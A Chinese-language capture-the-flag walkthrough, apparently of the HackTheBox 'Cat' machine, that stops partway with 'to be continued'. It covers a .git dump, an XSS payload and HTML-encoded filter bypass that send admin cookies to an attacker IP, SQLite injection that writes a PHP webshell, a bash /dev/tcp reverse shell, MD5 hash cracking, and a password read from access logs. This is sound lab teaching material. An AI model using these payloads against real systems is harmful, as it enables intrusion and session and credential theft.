第一阶段 侦查
nmap扫到22 80端口
oxdf@hacky$ nmap -p- --min-rate 10000 10.10.11.53
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-03 14:39 EST
Nmap scan report for 10.10.11.53
Host is up (0.086s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 6.85 seconds
oxdf@hacky$ nmap -p 22,80 -sCV 10.10.11.53
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-03 14:39 EST
Nmap scan report for 10.10.11.53
Host is up (0.085s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 96:2d:f5:c6:f6:9f:59:60:e5:65:85:ab:49:e4:76:14 (RSA)
| 256 9e:c4:a4:40:e9:da:cc:62:d1:d6:5a:2f:9e:7b:d4:aa (ECDSA)
|_ 256 6e:22:2a:6a:6d:eb:de:19:b7:16:97:c2:7e:89:29:d5 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to http://cat.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.67 seconds
添加域名到host文件中
再用nmap扫一下域名,看能发现什么:
oxdf@hacky$ nmap -p 80 -sCV cat.htb
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-03 15:54 EST
Nmap scan report for cat.htb (10.10.11.53)
Host is up (0.085s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Best Cat Competition
| http-git:
| 10.10.11.53:80/.git/
| Git repository found!
| Repository description: Unnamed repository; edit this file 'description' to name the...
|_ Last commit message: Cat v1
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.81 seconds
找到了git repository: 10.10.11.53:80/.git/
80端口
Vote页面显示投票已结束:
/register /login 分别注册和登录,然后就可以提交小猫信息:
提交成功显示:
可以看出是php网站,burp查看首次GET请求的http回包头部是:
HTTP/1.1 200 OK
Date: Mon, 03 Feb 2025 20:29:30 GMT
Server: Apache/2.4.41 (Ubuntu)
Set-Cookie: PHPSESSID=h9rs7gar88khrprp3n47ngnahv; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 3075
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
开发者工具查看cookie详细信息,不是httponly:
当Cookie未设置HttpOnly属性时,攻击者可以通过注入恶意JavaScript脚本(例如通过评论区、表单等输入点)直接通过document.cookie读取Cookie内容。
后果:窃取的Cookie可能包含敏感信息(如会话ID),导致攻击者冒充用户身份。
最佳做法:始终为敏感Cookie设置HttpOnly(如会话ID、令牌)。并配合其他安全属性:
·Secure:仅通过HTTPS传输。
·SameSite:限制跨站请求携带Cookie(防御CSRF)。
·避免在前端存储敏感数据在Cookie中,必要时使用localStorage或sessionStorage(但需注意XSS风险)。
再查看下404页面:
目录爆破
使用 feroxbuster找还有哪些访问路径:
oxdf@hacky$ feroxbuster -u http://cat.htb -x php
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.11.0
───────────────────────────┬──────────────────────
🎯 Target Url │ http://cat.htb
🚀 Threads │ 50
📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.11.0
🔎 Extract Links │ true
💲 Extensions │ [php]
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 4
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
403 GET 9l 28w 272c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
404 GET 9l 31w 269c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200 GET 140l 327w 4004c http://cat.htb/join.php
200 GET 127l 270w 2900c http://cat.htb/css/styles.css
301 GET 9l 28w 304c http://cat.htb/uploads => http://cat.htb/uploads/
200 GET 1l 0w 1c http://cat.htb/config.php
302 GET 1l 0w 1c http://cat.htb/admin.php => http://cat.htb/join.php
302 GET 0l 0w 0c http://cat.htb/logout.php => http://cat.htb/
200 GET 129l 285w 3075c http://cat.htb/index.php
301 GET 9l 28w 300c http://cat.htb/css => http://cat.htb/css/
302 GET 1l 0w 1c http://cat.htb/contest.php => http://cat.htb/join.php
200 GET 41l 83w 1242c http://cat.htb/vote.php
301 GET 9l 28w 300c http://cat.htb/img => http://cat.htb/img/
200 GET 196l 415w 5082c http://cat.htb/winners.php
200 GET 129l 285w 3075c http://cat.htb/
200 GET 127l 270w 2900c http://cat.htb/css/styles
200 GET 127l 715w 53503c http://cat.htb/img/cat3.webp
200 GET 304l 1647w 132808c http://cat.htb/img/cat1.jpg
200 GET 904l 5604w 448419c http://cat.htb/img/cat2.png
301 GET 9l 28w 304c http://cat.htb/winners => http://cat.htb/winners/
200 GET 127l 715w 53503c http://cat.htb/img_winners/cat3.webp
200 GET 304l 1647w 132808c http://cat.htb/img_winners/cat1.jpg
200 GET 904l 5604w 448419c http://cat.htb/img_winners/cat2.png
200 GET 304l 1647w 132808c http://cat.htb/img/cat1
[####################] - 4m 150022/150022 0s found:22 errors:437
[####################] - 3m 30000/30000 150/s http://cat.htb/
[####################] - 3m 30000/30000 153/s http://cat.htb/uploads/
[####################] - 3m 30000/30000 156/s http://cat.htb/css/
[####################] - 3m 30000/30000 151/s http://cat.htb/img/
[####################] - 3m 30000/30000 167/s http://cat.htb/winners/
有几条值得关注的路径:
/admin.php 只是重定向回登录/注册页面。
/uploads(重定向到 /uploads/)返回 403 Forbidden,这里可能是上传的图片存放的位置。我尝试访问 /uploads/[png文件名],但返回 404 Not Found。
有点奇怪的是,存在 /img 和 /img_winners 这两个路径,访问它们都会返回 403。/winners 也一样。
除此之外,我们还可以下载 .git 仓库。
.Git
使用git-dumper下载
oxdf@hacky$ git-dumper http://cat.htb/.git git
用git checkout . 更新:
oxdf@hacky$ git checkout .
Updated 19 paths from the index
oxdf@hacky$ ls
accept_cat.php admin.php config.php contest.php css delete_cat.php img img_winners index.php join.php logout.php view_cat.php vote.php winners winners.php
查看log记录:
oxdf@hacky$ git log
commit 8c2c2701eb4e3c9a42162cfb7b681b6166287fd5 (HEAD -> master)
Author: Axel <axel2017@gmail.com>
Date: Sat Aug 31 23:26:14 2024 +0000
Cat v1
config.php
查看下刚下载的config.php:
<?php
// Database configuration
$db_file = '/databases/cat.db';
// Connect to the database
try {
$pdo = new PDO("sqlite:$db_file");
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
} catch (PDOException $e) {
die("Error: " . $e->getMessage());
}
?>
发现一个 /databases/cat.db SQLite 数据库。由于是 SQLite,连接时不需要用户名或密码。
contest.php
这个页面负责处理用户提交猫咪参赛信息的功能。查看源代码发现,有一段针对禁用字符的检查代码:
if ($_SERVER["REQUEST_METHOD"] == "POST") {
// Capture form data
$cat_name = $_POST['cat_name'];
$age = $_POST['age'];
$birthdate = $_POST['birthdate'];
$weight = $_POST['weight'];
$forbidden_patterns = "/[+*{}',;<>()\\[\\]\\/\\:]/";
// Check for forbidden content
if (contains_forbidden_content($cat_name, $forbidden_patterns) ||
contains_forbidden_content($age, $forbidden_patterns) ||
contains_forbidden_content($birthdate, $forbidden_patterns) ||
contains_forbidden_content($weight, $forbidden_patterns)) {
$error_message = "Your entry contains invalid characters.";
} else {
如果所有输入都通过验证,系统会为图片生成一个随机名称,并检查以下条件:
确保文件是有效的图片、文件扩展名符合要求、文件大小未超过限制、文件名在系统中不存在
如果全部符合要求,数据就会被写入数据库。
admin.php
首先检查了用户名是不是acel:
if (!isset($_SESSION['username']) || $_SESSION['username'] !== 'axel') {
header("Location: /join.php");
exit();
}
从猫数据库里获得所有:
$stmt = $pdo->prepare("SELECT * FROM cats");
$stmt->execute();
$cats = $stmt->fetchAll(PDO::FETCH_ASSOC);
?>
view_cat.php
还有一个 view_cat.php 页面(从该管理界面链接进入),仅对 axel 用户开放,用于展示猫咪的详细信息
accept_cat.php
在 admin.php 页面中,管理员可以通过链接来批准或删除猫咪提交记录。当点击"批准"按钮时,系统会向 accept_cat.php 发送请求。该脚本首先会进行以下验证:
确认当前用户是 axel
确保请求类型为 POST
检查参数是否设置正确:
<?php
include 'config.php';
session_start();
if (isset($_SESSION['username']) && $_SESSION['username'] === 'axel') {
if ($_SERVER["REQUEST_METHOD"] == "POST") {
if (isset($_POST['catId']) && isset($_POST['catName'])) {
...[snip]...
} else {
echo "Error: Cat ID or Cat Name not provided.";
}
} else {
header("Location: /");
exit();
}
} else {
echo "Access denied.";
}
?>
随后,系统会获取猫咪的 ID 和 name,并将这些信息插入到 accepted_cats 数据表中,同时从原始的 cats 表中移除该记录:
$cat_name = $_POST['catName'];
$catId = $_POST['catId'];
$sql_insert = "INSERT INTO accepted_cats (name) VALUES ('$cat_name')";
$pdo->exec($sql_insert);
$stmt_delete = $pdo->prepare("DELETE FROM cats WHERE cat_id = :cat_id");
$stmt_delete->bindParam(':cat_id', $catId, PDO::PARAM_INT);
$stmt_delete->execute();
echo "The cat has been accepted and added successfully.";
catName这里是整个代码库中唯一直接使用$pdo->exec处理原始字符串的实例,可以尝试注入。
第二阶段 漏洞利用
XSS
从逻辑推断,管理员可能会审查用户提交的cat信息决定是否通过审核。在分析源代码前,我首先尝试向contest表单的各个字段注入HTML/XSS测试代码,结果会显示:
这与之前的观察一致,因为任何包含[+*{}',;<>()\\[\\]\\/\\:] 的字符都应该被拒绝。
XSS绕过
有两种绕过该过滤器并窃取管理员Cookie的方法:
第一种:在用户名字段注入标准的XSS payload。
第二种:利用HTML注入,通过
"
符号向onerror
属性注入经过HTML编码的JavaScript(并移除其中的;
)。
方法1:通过用户名的XSS攻击
即使没有查看源代码,也可以合理推测,管理员在查看猫咪提交记录时,用户名可能会被回显。由于我没有在表单提交时提供用户名,因此它会从会话(Session)中获取。
而源代码证实了这一点。因此,我注册了一个用户名为:
0xdf<script>var i = new Image(); i.src="http://10.10.14.6/?c=" + document.cookie;</script>
然后,提交了一个cat信息,该HTML脚本便被注入到页面中。几秒钟后:
10.10.11.53 - - [03/Feb/2025 17:41:14] "GET /?c=PHPSESSID=vakha8c53alin8oq8350imggf0 HTTP/1.1" 200 -
获得cookie
方法2:通过HTML注入攻击
在过滤黑名单中,双引号 " 并未被禁止。在 admin.php 页面中,存在一个 <img> 标签:
<img src="<?php echo htmlspecialchars($cat['photo_path']); ?>"
alt="<?php echo htmlspecialchars($cat['cat_name']); ?>"
class="cat-photo">
其中,$cat['photo_path'] 的值无法控制,但 $cat['cat_name'] 是可以操控的(只要它通过了黑名单过滤)。
如果我将cat_name设置为:
alt" onerror="" oxdf="
那么最终<img>标签将变成:
<img src="[photo_path]" alt="alt" onerror="" oxdf="" class="cat-photo">
只要能让图片加载失败,就能执行 onerror 中的代码。
现在的问题是:如何在无法使用 (, ), ;, ' 等字符的情况下构造有效的 JavaScript?
在 onerror 属性中,JavaScript 可以执行 HTML 编码的字符串,而且即使省略分号 ; 也能正常运行!
为了本地测试,创建一个 index.html 文件:
<html>
<head>
</head>
<body>
<img src="x" onerror="alert(1);" />
</body>
</html>
虽然代码中省略了分号(;),但 onerror 中的 HTML 编码字符串仍会被解码并执行,相当于执行 alert(1)。
在 Firefox 浏览器中打开该页面时,成功触发了弹窗:
测试成功。因为& #两个符号都没被过滤,我们可以构造:
var i = new Image(); i.src="http://10.10.14.6/?c=" + document.cookie
HTML编码:
var i = new Image(); i.src="http://10.10.14.6/?c=" + document.cookie
粘贴到onerror里面。
先提交一个正常的猫咪参赛信息,并通过 Burp Repeater 拦截请求。然后,将猫咪名称(cat_name)替换为 HTML 实体编码的 XSS 攻击载荷,同时调整图片文件:保持 PNG 文件头有效性(Magic Bytes:‰PNG),确保服务器校验通过;但使图片在 Firefox 中加载失败,从而触发 onerror 执行恶意脚本。
收到cookie:
10.10.11.53 - - [03/Feb/2025 18:17:52] "GET /?c=PHPSESSID=akukm6g15pek4m46n9ut8uu14a HTTP/1.1" 200 -
SQL 注入攻击
1. 管理员权限获取
通过窃取的管理员 Cookie,成功访问了admin.php页面。为了测试,我在另一个浏览器提交了一条新的猫咪记录,并确认其显示在管理后台:
2. 测试接受路径的SQL注入漏洞
我注意到之前发现的SQL注入漏洞存在于猫咪审核功能中(accept_cat.php
)。点击"接受"按钮后:
3. 构造SQL注入验证(PoC)
将接受请求发送到Burp Repeater,在name
参数中插入单引号'
进行测试:
已知该系统使用SQLite数据库,这意味着可能支持堆叠查询(stacked queries)。
4. 文件写入攻击实现
参考PayloadsAllTheThings的SQLite注入方案,构造webshell写入payload:
ATTACH DATABASE '/var/www/lol.php' AS lol;
CREATE TABLE lol.pwn (dataz text);
INSERT INTO lol.pwn (dataz) VALUES ("<?php system($_GET['cmd']); ?>");--
需要先闭合原始查询:
muffins'); ATTACH DATABASE '/var/www/0xdf.php' as db; CREATE TABLE db.pwn (stuff text); INSERT INTO db.pwn (stuff) VALUES ("test");-- -
url编码后:
路径可能不对,换成相对路径:
成功
换成webshell:
把 Bash 反向 Shell 代码 作为命令写入 Web Shell,从而获取服务器交互式访问权限。获取基础 Shell 后,升级为功能完整的 TTY Shell
http://....php?cmd=bash%20-i%20%3E%26%20/dev/tcp/10.0.0.1/4444%200%3E%261
www-data@cat:/var/www/cat.htb$ script /dev/null -c bash
script /dev/null -c bash
Script started, file is /dev/null
www-data@cat:/var/www/cat.htb$ ^Z
[1]+ Stopped nc -lnvp 444
oxdf@hacky$ stty raw -echo; fg
nc -lnvp 444
reset
reset: unknown terminal type unknown
Terminal type? screen
www-data@cat:/var/www/cat.htb$
获得www-data用户权限
第三阶段 权限提升
www-data@cat:/home$ ls
axel git jobert rosa
www-data@cat:/home$ cat /etc/passwd | grep "sh$"
root:x:0:0:root:/root:/bin/bash
axel:x:1000:1000:axel:/home/axel:/bin/bash
rosa:x:1001:1001:,,,:/home/rosa:/bin/bash
git:x:114:119:Git Version Control,,,:/home/git:/bin/bash
jobert:x:1002:1002:,,,:/home/jobert:/bin/bash
当前 Web 目录的结构与我之前发现的完全一致。数据库位于 /databases
目录下,现在我可以直接访问它:
www-data@cat:/databases$ sqlite3 cat.db
SQLite version 3.31.1 2020-01-27 19:55:54
Enter ".help" for usage hints.
sqlite> .tables
accepted_cats cats users
sqlite> .headers on
sqlite> select * from users;
user_id|username|email|password
1|axel|axel2017@gmail.com|d1bbba3670feb9435c9841e46e60ee2f
2|rosa|rosamendoza485@gmail.com|ac369922d560f17d6eeb8b2c7dec498c
3|robert|robertcervantes2000@gmail.com|42846631708f69c00ec0c0a8aa4a92ad
4|fabian|fabiancarachure2323@gmail.com|39e153e825c4a3d314a0dc7f7475ddbe
5|jerryson|jerrysonC343@gmail.com|781593e060f8d065cd7281c5ec5b4b86
6|larry|larryP5656@gmail.com|1b6dce240bbfbc0905a664ad199e18f8
7|royer|royer.royer2323@gmail.com|c598f6b844a36fa7836fba0835f1f6
8|peter|peterCC456@gmail.com|e41ccefa439fc454f7eadbf1f139ed8a
9|angel|angel234g@gmail.com|24a8ec003ac2e1b3c5953a6f95f8f565
10|jobert|jobert2020@gmail.com|88e4dceccd48820cf77b5cf6c08698ad
11|0xdf|0xdf@cat.htb|465e929fc1e0853025faad58fc8cb47d
hex32编码,john.php也告诉我们了:
if ($_SERVER["REQUEST_METHOD"] == "GET" && isset($_GET['registerForm'])) {
$username = $_GET['username'];
$email = $_GET['email'];
$password = md5($_GET['password']);
CrackStation - Online Password Hash Cracking - MD5, SHA1, Linux, Rainbow Tables, etc.
用这个网站查下
找到一个密码rosa:soyunapeincesarosa
su - rosa
www-data@cat:/var/www$ su - rosa
Password:
rosa@cat:~$
ssh也可以
rosa是adm组的一员:
rosa@cat:~$ id
uid=1001(rosa) gid=1001(rosa) groups=1001(rosa),4(adm)
找出所有属于adm组的文件或目录
rosa@cat:~$ find / -group adm 2>/dev/null
/var/log/audit
/var/log/audit/audit.log
/var/log/audit/audit.log.4
/var/log/audit/audit.log.1
/var/log/audit/audit.log.3
/var/log/audit/audit.log.2
/var/log/syslog.2.gz
/var/log/syslog.1
/var/log/apt/term.log.2.gz
/var/log/apt/term.log.5.gz
/var/log/apt/term.log.4.gz
/var/log/apt/term.log.6.gz
/var/log/apt/term.log.3.gz
/var/log/apt/term.log
/var/log/apt/term.log.1.gz
/var/log/auth.log.1
/var/log/kern.log.1
/var/log/dmesg
/var/log/apache2
/var/log/apache2/access.log
/var/log/apache2/access.log.2.gz
/var/log/apache2/error.log.1
/var/log/apache2/error.log
/var/log/apache2/access.log.3.gz
/var/log/apache2/error.log.2.gz
/var/log/apache2/other_vhosts_access.log
/var/log/apache2/access.log.1
/var/log/apache2/error.log.3.gz
/var/log/kern.log
/var/log/installer
/var/log/installer/subiquity-server-info.log.2098
/var/log/installer/subiquity-server-debug.log.2098
/var/log/installer/installer-journal.txt
/var/log/installer/subiquity-curtin-install.conf
/var/log/installer/subiquity-client-info.log.2048
/var/log/installer/autoinstall-user-data
/var/log/installer/subiquity-curtin-apt.conf
/var/log/installer/subiquity-client-debug.log.2048
/var/log/mail.log
/var/log/mail.log.1
/var/log/syslog.3.gz
/var/log/cloud-init.log
/var/log/syslog
/var/log/cloud-init-output.log
/var/log/auth.log
/var/spool/rsyslog
/etc/hostname
/etc/cloud/cloud.cfg.d/99-installer.cfg
/etc/cloud/ds-identify.cfg
/etc/hosts
Apache的访问日志(access.log)会记录所有页面请求的尝试。在分析注册和登录流程时,可以注意到这些操作竟然是通过 GET请求 实现的——这显然是一种极不安全的做法。
而事实证明,这恰恰是攻击路径。查看 /var/log/apache2/access.log 可以发现,用户 axel 每隔约10秒就会触发一次登录请求的日志记录:
127.0.0.1 - - [04/Feb/2025:02:20:11 +0000] "GET /join.php?loginUsername=axel&loginPassword=aNdZwgC4tI9gnVXv_e3Q&loginForm=Login HTTP/1.1" 302 329 "http://cat.htb/join.php" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0"
发现axel密码
su - axel
rosa@cat:~$ su - axel
Password:
axel@cat:~$ cat user.txt
78087ea7************************
第四阶段 再次侦查
查看端口:
axel@cat:~$ netstat -tnl
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.1:3000 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.1:40601 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.1:54203 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.1:587 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.1:41135 0.0.0.0:* LISTEN
tcp6 0 0 :::22 :::* LISTEN
tcp6 0 0 :::80 :::* LISTEN
端口 | 协议 | 绑定地址 | 服务/用途 | 安全风险等级 |
---|---|---|---|---|
53 | TCP | 127.0.0.53 | DNS 解析(systemd-resolved) | 低(仅本地) |
22 | TCP | 0.0.0.0 & ::: | SSH 服务 | 中(暴露公网需强化) |
3000 | TCP | 127.0.0.1 | 本地开发服务(如Node.js) | 低(仅本地) |
25 | TCP | 127.0.0.1 | SMTP(本地邮件服务) | 低(仅本地) |
587 | TCP | 127.0.0.1 | 邮件提交端口(MSA) | 低(仅本地) |
邮件
/var/spool/mail 目录有三个用户:
axel@cat:/var/spool/mail$ ls
axel jobert root
axel里面有rosa发的信息:
From rosa@cat.htb Sat Sep 28 04:51:50 2024
Return-Path: <rosa@cat.htb>
Received: from cat.htb (localhost [127.0.0.1])
by cat.htb (8.15.2/8.15.2/Debian-18) with ESMTP id 48S4pnXk001592
for <axel@cat.htb>; Sat, 28 Sep 2024 04:51:50 GMT
Received: (from rosa@localhost)
by cat.htb (8.15.2/8.15.2/Submit) id 48S4pnlT001591
for axel@localhost; Sat, 28 Sep 2024 04:51:49 GMT
Date: Sat, 28 Sep 2024 04:51:49 GMT
From: rosa@cat.htb
Message-Id: <202409280451.48S4pnlT001591@cat.htb>
Subject: New cat services
Hi Axel,
We are planning to launch new cat-related web services, including a cat care website and other projects. Please send an email to jobert@localhost with information about your Gitea repository. Jobert will check if it is a promising service that we can develop.
Important note: Be sure to include a clear description of the idea so that I can understand it properly. I will review the whole repository.
From rosa@cat.htb Sat Sep 28 05:05:28 2024
Return-Path: <rosa@cat.htb>
Received: from cat.htb (localhost [127.0.0.1])
by cat.htb (8.15.2/8.15.2/Debian-18) with ESMTP id 48S55SRY002268
for <axel@cat.htb>; Sat, 28 Sep 2024 05:05:28 GMT
Received: (from rosa@localhost)
by cat.htb (8.15.2/8.15.2/Submit) id 48S55Sm0002267
for axel@localhost; Sat, 28 Sep 2024 05:05:28 GMT
Date: Sat, 28 Sep 2024 05:05:28 GMT
From: rosa@cat.htb
Message-Id: <202409280505.48S55Sm0002267@cat.htb>
Subject: Employee management
We are currently developing an employee management system. Each sector administrator will be assigned a specific role, while each employee will be able to consult their assigned tasks. The project is still under development and is hosted in our private Gitea. You can visit the repository at: http://localhost:3000/administrator/Employee-management/. In addition, you can consult the README file, highlighting updates and other important details, at: http://localhost:3000/administrator/Employee-management/raw/branch/main/README.md.
有一员工管理系统:http://localhost:3000/administrator/Employee-management/
ssh本地端口转发登录:ssh -L 3000:localhost:3000
未完待续